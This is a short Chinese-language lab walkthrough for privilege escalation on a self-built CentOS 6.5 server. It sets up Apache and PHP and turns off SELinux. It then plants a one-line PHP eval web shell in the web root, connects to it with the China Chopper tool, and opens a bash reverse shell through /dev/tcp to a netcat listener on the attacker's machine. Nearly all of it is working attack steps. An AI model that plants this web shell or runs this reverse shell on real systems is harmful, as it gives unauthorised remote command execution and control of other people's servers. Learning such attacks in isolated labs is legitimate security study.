实验环境:Centos6.5、ssh
实验步骤:
一、搭建实验环境
1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpd php
2.启动http,进入etc/init.d目录,输入:./httpd start
3.关掉selinux,输入:setenforce 0
4.在var/www/html目录下写一个一句话木马文件,内容为:<?php @eval($_REQUEST[666]);?>
二、进行提权
1.利用中国菜刀连接Centos,打开虚拟终端
2.获取交互式shell,输入:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,并在cmd中利用nc开启监听的端口号,交互成功
3.利用uname -a命令查看系统的内核系统